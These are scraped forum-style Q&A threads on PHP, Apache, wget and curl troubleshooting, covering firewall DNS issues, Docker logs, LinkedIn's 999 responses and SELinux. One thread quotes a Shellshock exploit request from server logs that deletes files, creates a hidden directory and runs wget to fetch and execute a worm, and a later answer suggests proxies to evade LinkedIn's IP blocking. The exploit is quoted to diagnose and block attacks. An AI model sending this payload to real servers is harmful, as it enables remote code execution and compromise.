wget fails on a local domain - php

I have a Red Hat linux box with apache running several domains, including a.com and b.com.
I have a php script a.com/wget.php, which makes an exec() call to download a file on the local domain b.com. Running the php script from the command line is successful.
But running this script from a web page results in a 404 error. The command is:
/usr/bin/wget -k -S --save-headers --keep-session-cookies
-O <local-file-name> -o <local-log-file-name> -U \"Mozilla/5.0
(Macintosh; Intel Mac OS X 10.8; rv:24.0) Gecko/20100101
Firefox/24.0\" --max-redirect=100 "http://b.com/page.php"
No log messages are written to the Apache access log file for domain b.com for this call.
BUT the server access log file (/var/log/httpd/access_log) is NOT empty, it shows that there was an attempt made to open page "/page.php" on the server (the link in access log has no domain).
xx.xx.xx.xx - - [19/May/2014:12:02:49 +0100] "GET /page.php
HTTP/1.0" 404 285 "-" "Mozilla/5.0 (Macintosh;
Intel Mac OS X 10.8; rv:24.0) Gecko/20100101 Firefox/24.0"
Server error log (/var/log/httpd/error_log) gives this error:
[Mon May 19 12:02:49 2014] [error] [client xx.xx.xx.xx]
File does not exist: /var/www/vhosts/default/htdocs
So it would seem that something is stripping the domain name from "http://b.com/page.php" and the resulting URL that wget is trying to connect to is "/page.php". This will not work, given that the server has many domains on it.
Has anyone come across this? Is there some setting in wget or php or apache that would cause this to not happen? I tried different things based on suggestions regarding similar problems, but nothing has worked so far.
Thanks.

The problem turned out to be not in wget, but in firewall settings. The wget call, executed from behind the firewall, was resolving the domain to an external IP address, and connections to the external IP address were failing. Correcting this in the firewall fixed the wget problem.

Related

Can't find a docker php/nginx error log matching error 500

I have a php docker app running with multiple containers such as
j_php-fpm_1 and j_nginx_1
j_php-fpm_1 is the container with the whole project (Magento / php but that's not relevant here).
My issue is the following
At some point in the app I trigger A technical problem with the server created an error. Try again to continue what you were doing. If the problem persists, try again later. which means I have a server error within my php even before entering the framework.
So I have been into my j_php-fpm_1 but the file can't be read due to permission denied
make bash
docker-compose exec -u magento php-fpm bash
magento#315933593d37:/var/www/magento$ ls -al /var/log/php7.3-fpm.log -rw------- 1 root root 0 Jan 3 10:04 /var/log/php7.3-fpm.log
magento#315933593d37:/var/www/magento$
cat: /var/log/php7.3-fpm.log: Permission denied
Then I tried to check the live nginx logs
docker logs j_nginx_1
As a result I see my request triggering the error, but still no errors printed in the log
172.21.0.1 - - [05/Jan/2022:15:22:34 +0000] "POST /admin_sdj/sponsorship/index/sponsorship/key/d81ba9d66a439a3fe7a2e70e9567830be8b3a1cef39f8984002129045622fb59/id/1/?isAjax=true HTTP/1.1" 200 190 "http://j.dev-cpy.fr/admin_sdj/customer/index/edit/id/1/key/05dae1e3543127f8c02295e29b06b70722d085f69a37b0d7155fc257ce6b1257/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36"
access log and error log from the ngning container are empty.
Any ideas where I can find my error log ?
PS : I can't change the php fpm logfile rights.
EDIT : Connecting as root with docker exec -it --user root j_php-fpm_1 /bin/bash shows the fpm log file is empty too.
I don't know where to look at anymore
I found the my error's origin; it was actually due to a wrong url path triggering a 404 error...which was triggering then the server error in some following request. Still no idea about the logs though, but at least my issue is solved right now. I let the topic open in case someone has an idea.

Linux Apache in Sleep State

I have a Linux Ubuntu server having Apache2 that runs PHP.
All of a sudden my website gets error:
404 Not Found: The requested URL / was not found on this server
I tried:
sudo service apache2 status
Result:
Apache2 is running (pid 1546)
So I tried:
cat /proc/1546/status
Result:
State: S(sleeping)
Apache error.log file:
[Fri Jul 24 05:22:46 2015] [error] [client 155.124.123.161] File does not exist: /etc/apache2/htdocs
My question is, is this maybe the reason why my Apache server is not working properly that I get Not Found error? Is Sleep state of Apache a problem and what should I do about it? My website codes is in path /var/www/mywebapplication. It is working for a very long time but suddenly it gets error.
Thank you very much.

Apache http server has stopped working

Hi Friends,
I am using Ampps server with php 5.3.29 in windows server datacenter.
unfortunately i am getting the following prompt in windows server and my site down.
Prompt title:
Microsoft windows
Prompt Message:
Apache http server has stopped working.
A problem caused the program to stop working correctly. windows will close the program and notify you if a solution is available.
Trace:
When i tracing error and access logs, i found the following logs as the cause.
In Apache access log:
202.175.83.36 - - [10/Dec/2014:05:58:50 -0500] "GET /cgi-bin/authLogin.cgi HTTP/1.1" 404 1335
217.248.177.30 - - [10/Dec/2014:06:11:24 -0500] "GET /cgi-bin/authLogin.cgi HTTP/1.1" 404 1335
209.153.244.6 - - [10/Dec/2014:07:09:17 -0500] "GET /cgi-bin/authLogin.cgi HTTP/1.1" 404 1335
81.214.132.245 - - [10/Dec/2014:07:25:04 -0500] "GET /cgi-bin/authLogin.cgi HTTP/1.1" 404 1335
In Apache error log:
[Wed Dec 10 07:25:04.401073 2014] [cgi:error] [pid 2908:tid 1168] [client 81.214.132.245:36246] script not found or unable to stat: D:/Program Files/Ampps/www/cgi-bin/authLogin.cgi
Please help me.
There is a Web bot trying to get authority so it can wget and execute something like S0.py, which I imagine is a worm so the download server is compromised.
Id like a copy of S0.sh if you happen to get one give it to exploit-db or something like it.
The clever command is:
Get /cgi-bin/authLogin.cgi HTTP/1.1.Host: 127.0.0.1.User-Agent:() { :; }; /bin/rm -rf /tmp/S0.sh && /bin/mkdir -p /share/HDB_DATA/.../php && /usr/bin/wget
The file is executed following download.
I suppose there's something about HDB_DATA, which I don't even have.
"Information is Paramount!"
If you try to open this file, what happens?
D:/Program Files/Ampps/www/cgi-bin/authLogin.cgi
The message indicates that the file does not exist, as indicated by the 404 error and the message "script not found".
Finally i denied those client to access the cgi-bin directory.
in cgi-bin directory i created a .htaccess file
I added following line in .htaccess
Deny From all.
I don't think authLogin.cgi really matters other than it might allow someone to execute. The problem is that the user tries to or successfully removes /tmp/S0.sh and make a directory php in the share folder and then execute wget.
/bin/rm -rf /tmp/S0.sh && /bin/mkdir -p /share/HDB_DATA/.../php && /usr/bin/wget
Here is what came up after all that time of wondering:
http://jrnerqbbzrq.blogspot.com/2014/12/a-little-shellshock-fun.html
"S0.sh consists of two main parts ... the first part does the initial setup and downloads additional programs, and then the second part installs the worm and executes some additional commands."
So it was a real treat catching this action and initially no one knew to call it Shellshock. There is a copy of S0.sh there and you can see it's a worm, which I presumed was the case.
From what I read the worm is just browsing the IP space looking for anyone listening to port 8080.

999 Error Code on HEAD request to LinkedIn

We're using a curl HEAD request in a PHP application to verify the validity of generic links. We check the status code just to make sure that the link the user has entered is valid. Links to all websites have succeeded, except LinkedIn.
While it seems to work locally (Mac), when we attempt the request from any of our Ubuntu servers, LinkedIn returns a 999 status code. Not an API request, just a simple curl like we do for every other link. We've tried on a few different machines and tried altering the user agent, but no dice. How do I modify our curl so that working links return a 200?
A sample HEAD request:
curl -I --url https://www.linkedin.com/company/linkedin
Sample Response on Ubuntu machine:
HTTP/1.1 999 Request denied
Date: Tue, 18 Nov 2014 23:20:48 GMT
Server: ATS
X-Li-Pop: prod-lva1
Content-Length: 956
Content-Type: text/html
To respond to #alexandru-guzinschi a little better. We've tried masking the User Agents. To sum up our trials:
Mac machine + Mac UA => works
Mac machine + Windows UA => works
Ubuntu remote machine + (no UA change) => fails
Ubuntu remote machine + Mac UA => fails
Ubuntu remote machine + Windows UA => fails
Ubuntu local virtual machine (on Mac) + (no UA change) => fails
Ubuntu local virtual machine (on Mac) + Windows UA => works
Ubuntu local virtual machine (on Mac) + Mac UA => works
So now I'm thinking they block any curl requests that dont provide an alternate UA and also block hosting providers?
Is there any other way I can check if a link to linkedin is valid or if it will lead to their 404 page, from an Ubuntu machine using PHP?
It looks like they filter requests based on the user-agent:
$ curl -I --url https://www.linkedin.com/company/linkedin | grep HTTP
HTTP/1.1 999 Request denied
$ curl -A "Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3" -I --url https://www.linkedin.com/company/linkedin | grep HTTP
HTTP/1.1 200 OK
I found the workaround,
important to set accept-encoding header:
curl --url "https://www.linkedin.com/in/izman" \
--header "user-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36" \
--header "accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8" \
--header "accept-encoding:gzip, deflate, sdch, br" \
| gunzip
Seems like LinkedIn filter both user agent AND ip address. I tried this both at home and from an Digital Ocean node:
curl -A "Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3" -I --url https://www.linkedin.com/company/linkedin
From home I got a 200 OK, from DO I got 999 Denied...
So you need a proxy service like HideMyAss or other (haven't tested it so I couldn't say if it's valid or not). Here is a good comparison of proxy services.
Or you could setup a proxy on your home network, for example use a Raspberry PI to proxy your requests. Here is a guide on that.
Proxy would work, but I think there's another way around it. I see that from AWS and other clouds that it's blocked by IP. I can issue the request from my machine and it works just fine.
I did notice that in the response from the cloud service that it returns some JS that the browser has to execute to take you to a login page. Once there, you can login and access the page. The login page is only for those accessing via a blocked IP.
If you use a headless client that executes JS, or maybe go straight to the subsequent link and provide the credentials of a linkedin user, you may be able to bypass it.

wkhtmltopdf integrated with php doesn't work on Centos (access deny)

I installed wkhtmltopdf on my Centos server.
Everything works fine in the shell. If I try to send the command in the shell:
/usr/local/bin/wkhtmltopdf http://www.google.it /var/www/html/test_report.pdf
or simply
wkhtmltopdf ... /var/www/html/test_report.pdf
everything goes well, but the same is not working if i use the exec command in a php script:
exec("/usr/local/bin/wkhtmltopdf http://www.google.it /var/www/html/test_report.pdf");
I changed the chmod of the html folder in 0777, but in the access.log I have the following response:
[08/Oct/2012:17:11:18 +0200] "GET test_report.php HTTP/1.1"
200 311 "-" "Mozilla/5.0 (Windows NT 6.1; rv:15.0) Gecko/20100101
Firefox/15.0.1"
The same script works fine on a windows 2003 server.
Is there a way to get around this error?
Thank you.
Most likely SELinux is blocking it, I had the same issue once.
Don't disable SELinux (that's just a bad idea/the lazy man's way to "fix" it), but use the audit2allow tool instead to figure out what context/SELinux booleans need to be altered.
See http://wiki.centos.org/HowTos/SELinux#head-faa96b3fdd922004cdb988c1989e56191c257c01 for more details.
In my case the problem was SELinux (as #Oldskool mentioned his answer). In execoutput there was only information PROT_EXEC|PROT_WRITE failed.
To resolve the problem I ran:
setsebool httpd_execmem on
I found this solution at groups.google.com

Categories